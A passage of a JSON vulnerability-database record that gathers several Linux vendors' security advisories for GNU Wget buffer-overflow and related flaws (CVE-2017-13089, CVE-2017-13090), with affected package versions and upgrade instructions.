5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-26T00:00:00", "id": "ELSA-2017-3075", "href": "http://linux.oracle.com/errata/ELSA-2017-3075.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-06T06:37:03", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.14-18.el7", "arch": "src", "packageFilename": "wget-1.14-18.el7.src.rpm", "packageName": "wget", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.14-18.el7", "arch": "x86_64", "packageFilename": "wget-1.14-18.el7.x86_64.rpm", "packageName": "wget", "operator": "lt"}], "description": "[1.14-18]\n- Fix CVE-2018-0494 (#1576106)\n[1.14-17]\n- Fix segfault when Digest Authentication header is missing 'qop' part (#1545310)\n[1.14-16]\n- Fixed various security flaws (CVE-2017-13089, CVE-2017-13090)", "edition": 1, "reporter": "Oracle", "published": "2018-11-05T00:00:00", "title": "wget security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"modified": "2018-11-06T06:37:03", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090", "CVE-2018-0494"], "modified": "2018-11-05T00:00:00", "id": "ELSA-2018-3052", "href": "http://linux.oracle.com/errata/ELSA-2018-3052.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2017-11-11T18:33:44", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=635496", "https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13089", "https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13090"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.19.1-r2", "arch": "all", "packageName": "net-misc/wget", "packageFilename": "UNKNOWN", "operator": "lt"}], "description": "### Background\n\nGNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Wget. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker, by enticing a user to connect to a malicious server, could remotely execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Wget users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/wget-1.19.1-r2\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2017-11-11T00:00:00", "title": "GNU Wget: Multiple vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-11-11T00:00:00", "href": "https://security.gentoo.org/glsa/201711-06", "id": "GLSA-201711-06", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2017-10-27T20:32:02", "references": ["https://bugzilla.suse.com/1064716", "https://bugzilla.suse.com/1064715"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}], "description": "This update for wget fixes the following security issues:\n\n - CVE-2017-13089,CVE-2017-13090: Missing checks for negative\n remaining_chunk_size in skip_short_body and fd_read_body could cause\n stack buffer overflows, which could have been exploited by malicious\n servers. (bsc#1064715,bsc#1064716)\n\n", "edition": 1, "reporter": "Suse", "published": "2017-10-27T18:53:31", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for wget (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-27T18:53:31", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00078.html", "id": "SUSE-SU-2017:2871-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-10-28T02:32:02", "references": ["https://bugzilla.suse.com/1064716", "https://bugzilla.suse.com/1064715"], "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "42.2", "packageVersion": "1.14-8.6.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-8.6.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.2", "packageVersion": "1.14-8.6.1", "packageName": "wget", "packageFilename": "wget-1.14-8.6.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.2", "packageVersion": "1.14-8.6.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-8.6.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "1.14-12.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-12.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "1.14-12.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-12.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.2", "packageVersion": "1.14-8.6.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-8.6.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.2", "packageVersion": "1.14-8.6.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-8.6.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "1.14-12.1", "packageName": "wget", "packageFilename": "wget-1.14-12.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "1.14-12.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-12.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "1.14-12.1", "packageName": "wget", "packageFilename": "wget-1.14-12.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "1.14-12.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-12.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.2", "packageVersion": "1.14-8.6.1", "packageName": "wget", "packageFilename": "wget-1.14-8.6.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "This update for wget fixes the following security issues:\n\n - CVE-2017-13089,CVE-2017-13090: Missing checks for negative\n remaining_chunk_size in skip_short_body and fd_read_body could cause\n stack buffer overflows, which could have been exploited by malicious\n servers. (bsc#1064715,bsc#1064716)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "reporter": "Suse", "published": "2017-10-28T00:14:14", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for wget (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-10-28T00:14:14", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00081.html", "id": "OPENSUSE-SU-2017:2884-1", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-16T18:33:46", "references": ["https://bugzilla.suse.com/1064716", "https://bugzilla.suse.com/1064715"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "6", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "6", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.aarch64.rpm", "arch": "aarch64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE OpenStack Cloud", "OSVersion": "6", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debuginfo", "packageFilename": "wget-debuginfo-1.14-21.3.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.ppc64le.rpm", "arch": "ppc64le", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget", "packageFilename": "wget-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "1.14-21.3.1", "packageName": "wget-debugsource", "packageFilename": "wget-debugsource-1.14-21.3.1.s390x.rpm", "arch": "s390x", "operator": "lt"}], "description": "This update for wget fixes the following security issues:\n\n - CVE-2017-13089,CVE-2017-13090: Missing checks for negative\n remaining_chunk_size in skip_short_body and fd_read_body could cause\n stack buffer overflows, which could have been exploited by malicious\n servers. (bsc#1064715,bsc#1064716)\n\n", "edition": 1, "reporter": "Suse", "published": "2017-11-16T15:08:57", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for wget (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-11-16T15:08:57", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00027.html", "id": "SUSE-SU-2017:2871-2", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2018-12-11T17:40:59", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.14-15.el7_4.1", "arch": "aarch64", "packageName": "wget", "packageFilename": "wget-1.14-15.el7_4.1.aarch64.rpm", "operator": "lt"}], "description": "The wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* A stack-based and a heap-based buffer overflow flaws were found in wget when processing chunked encoded HTTP responses. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit these flaws to potentially execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these issues.", "reporter": "RedHat", "published": "2017-10-26T20:09:21", "type": "redhat", "title": "(RHSA-2017:3075) Important: wget security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-12T03:32:41", "id": "RHSA-2017:3075", "href": "https://access.redhat.com/errata/RHSA-2017:3075", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:26:03", "references": [], "description": "USN-3464-1: Wget vulnerabilities\n\n# \n\n**Medium**\n\n# Vendor\n\n**Canonical Ubuntu**\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nAntti Levom\u00e4ki, Christian Jalio, and Joonas Pihlaja discovered that Wget incorrectly handled certain HTTP responses. A remote attacker could use this issue to cause Wget to crash, resulting in a denial of service, or possibly execute arbitrary code. ([CVE-2017-13089](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-13089>), [CVE-2017-13090](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-13090>))\n\nDawid Golunski discovered that Wget incorrectly handled recursive or mirroring mode. A remote attacker could possibly use this issue to bypass intended access list restrictions. ([CVE-2016-7098](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7098>))\n\nOrange Tsai discovered that Wget incorrectly handled CRLF sequences in HTTP headers. A remote attacker could possibly use this issue to inject arbitrary HTTP headers. ([CVE-2017-6508](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6508>))\n\n# Affected Cloud Foundry Products and Versions\n\n**_Severity is medium unless otherwise noted._**\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.32\n * 3445.x versions prior to 3445.17\n * 3468.x versions prior to 3468.11\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.165.0\n\n# Mitigation\n\n**OSS users are strongly encouraged to follow one of the mitigations below:**\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.32\n * Upgrade 3445.x versions prior to 3445.17\n * Upgrade 3468.x versions prior to 3468.11\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.165.0 or later.\n\n# References\n\n * [USN-3464-1](<http://www.ubuntu.com/usn/usn-3464-1/>)\n * [CVE-2017-13089](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-13089>)\n * [CVE-2017-13090](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-13090>)\n * [CVE-2016-7098](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7098>)\n * [CVE-2017-6508](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6508>)\n", "edition": 4, "reporter": "Cloud Foundry", "published": "2017-11-27T00:00:00", "title": "USN-3464-1: Wget vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2017-6508", "CVE-2017-13089", "CVE-2017-13090", "CVE-2016-7098"], "modified": "2017-11-27T00:00:00", "id": "CFOUNDRY:6B20128629C77D85690FBF074EA87264", "href": "https://www.cloudfoundry.org/blog/usn-3464-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:39", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7098", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-6508", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13090", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13089"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "17.04", "packageVersion": "1.18-2ubuntu1.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "wget", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "16.04", "packageVersion": "1.17.1-1ubuntu1.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "wget", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "17.10", "packageVersion": "1.19.1-3ubuntu1.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "wget", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1.15-1ubuntu1.14.04.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "wget", "operator": "lt"}], "description": "Antti Levom\u00c3\u00a4ki, Christian Jalio, and Joonas Pihlaja discovered that Wget incorrectly handled certain HTTP responses. A remote attacker could use this issue to cause Wget to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2017-13089, CVE-2017-13090)\n\nDawid Golunski discovered that Wget incorrectly handled recursive or mirroring mode. A remote attacker could possibly use this issue to bypass intended access list restrictions. (CVE-2016-7098)\n\nOrange Tsai discovered that Wget incorrectly handled CRLF sequences in HTTP headers. A remote attacker could possibly use this issue to inject arbitrary HTTP headers. (CVE-2017-6508)", "edition": 3, "reporter": "Ubuntu", "published": "2017-10-26T00:00:00", "title": "Wget vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-6508", "CVE-2017-13089", "CVE-2017-13090", "CVE-2016-7098"], "modified": "2017-10-26T00:00:00", "id": "USN-3464-1", "href": "https://usn.ubuntu.com/3464-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:19", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7098", "https://usn.ubuntu.com/usn/usn-3464-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-6508", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13090", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-13089"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "wget - 1.13.4-2ubuntu1.5", "operator": "lt"}], "description": "USN-3464-1 fixed several vulnerabilities in Wget. This update provides the corresponding update for Ubuntu 12.04 